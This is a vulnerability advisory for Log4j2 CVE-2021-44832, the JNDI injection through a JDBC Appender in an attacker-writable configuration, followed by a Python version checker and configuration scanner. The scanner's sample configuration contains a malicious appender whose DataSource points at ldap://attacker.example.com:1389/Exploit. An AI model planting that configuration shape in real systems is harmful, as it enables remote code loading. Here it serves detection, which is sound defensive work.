CVE-2021-44832: Improper Input Validation and Injection in Apache Log4j2
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding the security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution attack in which an attacker who can already modify the logging configuration supplies a JDBC Appender whose DataSource element names a JNDI URI under the attacker's control (for example an ldap:// or rmi:// name). The name is resolved through JNDI when the configuration is loaded and the appender is built, which can load and execute remote code. Unlike CVE-2021-44228 (Log4Shell), this is not triggered by logged input: the precondition is write access to the Log4j2 configuration file, or control of the location the configuration is loaded from. The issue is fixed by limiting JNDI data source names to the java protocol (names beginning with java:) in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.
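The two checks a practitioner would actually run for this advisory, as an added example that is not part of the GitLab page or the Log4j project: a version test against the affected range stated above (2.0-beta7 through 2.17.0, minus the 2.3.2 and 2.12.4 backports), and a scan of a Log4j2 XML configuration for JDBC Appender DataSource jndiName values that use any scheme other than java:, which is exactly the restriction the fixed releases enforce. The sample configuration, its appender names and the attacker.example.com host are constructed for the example; the choice to flag scheme-less names for manual review is this example's assumption, not something the advisory states.

```python
"""Added example for CVE-2021-44832 (not code from the advisory or from Log4j).

1. is_affected_version(): is a Log4j2 version in the affected range
   2.0-beta7 .. 2.17.0, excluding the fix releases 2.3.2 and 2.12.4?
2. find_unsafe_jdbc_jndi(): scan a Log4j2 XML configuration for JDBC
   Appenders whose DataSource jndiName does not use the java: scheme.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Pre-release ordering used by Log4j2 release names: 2.0-beta7 < 2.0-rc1 < 2.0.
_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
_RELEASE_RANK = 3  # a final release sorts after every pre-release of the same number


def version_key(version: str) -> tuple:
    """Turn '2.0-beta7', '2.17.0' or '2.12.4' into a comparable tuple."""
    base, _, pre = version.strip().partition("-")
    nums = [int(p) for p in base.split(".")]
    while len(nums) < 3:          # '2.0' -> 2.0.0
        nums.append(0)
    if not pre:
        return (*nums, _RELEASE_RANK, 0)
    m = re.fullmatch(r"(alpha|beta|rc)(\d*)", pre.lower())
    if not m:
        raise ValueError(f"unrecognised pre-release tag: {version}")
    return (*nums, _PRE_RANK[m.group(1)], int(m.group(2) or 0))


_FIRST_AFFECTED = version_key("2.0-beta7")
_LAST_AFFECTED = version_key("2.17.0")
_FIX_BACKPORTS = {version_key("2.3.2"), version_key("2.12.4")}


def is_affected_version(version: str) -> bool:
    """True if this Log4j2 version is vulnerable to CVE-2021-44832."""
    key = version_key(version)
    if key in _FIX_BACKPORTS:
        return False
    return _FIRST_AFFECTED <= key <= _LAST_AFFECTED


def _local_name(tag: str) -> str:
    """Strip an XML namespace and lower-case, since Log4j2 matches plugin names case-insensitively."""
    return tag.rsplit("}", 1)[-1].lower()


def find_unsafe_jdbc_jndi(config_xml: str) -> list:
    """Return one finding per JDBC DataSource whose jndiName is not a java: name.

    Assumption of this example: a jndiName with no scheme at all is reported
    as well (scheme None) so that a reviewer looks at it; only names that
    explicitly use the java: scheme are treated as safe.
    """
    root = ET.fromstring(config_xml)
    findings = []
    for appender in root.iter():
        if _local_name(appender.tag) != "jdbc":
            continue
        appender_name = appender.attrib.get("name", "<unnamed>")
        for child in appender:
            if _local_name(child.tag) != "datasource":
                continue
            jndi_name = next((v for k, v in child.attrib.items()
                              if k.lower() == "jndiname"), None)
            if jndi_name is None:
                continue
            scheme = urlsplit(jndi_name).scheme.lower()
            if scheme != "java":
                findings.append({"appender": appender_name,
                                 "jndiName": jndi_name,
                                 "scheme": scheme or None})
    return findings


# Constructed sample configuration: the first appender uses a container-local
# java: data source (the documented, safe shape); the second references an
# attacker-controlled LDAP server, the shape the advisory describes.
# attacker.example.com is a placeholder host.
SAMPLE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <JDBC name="databaseAppender" tableName="application_log">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource"/>
      <Column name="eventDate" isEventTimestamp="true"/>
      <Column name="message" pattern="%message"/>
    </JDBC>
    <JDBC name="maliciousAppender" tableName="x">
      <DataSource jndiName="ldap://attacker.example.com:1389/Exploit"/>
      <Column name="message" pattern="%message"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info">
      <AppenderRef ref="databaseAppender"/>
    </Root>
  </Loggers>
</Configuration>
"""

if __name__ == "__main__":
    for v in ("2.0-beta6", "2.0-beta7", "2.3.1", "2.3.2", "2.12.4", "2.17.0", "2.17.1"):
        print(f"{v:10s} affected={is_affected_version(v)}")
    for finding in find_unsafe_jdbc_jndi(SAMPLE_CONFIG):
        print("UNSAFE JDBC DataSource:", finding)
```

Running the script reports only maliciousAppender, with scheme ldap. The version check alone is not sufficient evidence of exposure: the attack still needs an attacker who can write the configuration, so a finding from the configuration scan on a host where untrusted users can edit log4j2.xml, or where the configuration is fetched from a URL, is the more urgent one. On the fixed releases the JDBC Appender resolves the data source through Log4j's JndiManager, which rejects non-java: names, and JNDI use by the JDBC Appender is additionally gated behind the log4j2.enableJndiJdbc system property.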
References
- cert-portal.siemens.com/productcert/pdf/ssa-784507.pdf
- github.com/advisories/GHSA-8489-44mv-ggj8
- github.com/apache/logging-log4j2
- issues.apache.org/jira/browse/LOG4J2-3293
- lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143
- lists.debian.org/debian-lts-announce/2021/12/msg00036.html
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EVV25FXL4FU5X6X5BSL7RLQ7T6F65MRA
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T57MPJUW3MA6QGWZRTMCHHMMPQNVKGFC
- nvd.nist.gov/vuln/detail/CVE-2021-44832
- sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
- security.netapp.com/advisory/ntap-20220104-0001
- www.oracle.com/security-alerts/cpuapr2022.html
- www.oracle.com/security-alerts/cpujan2022.html
- www.oracle.com/security-alerts/cpujul2022.html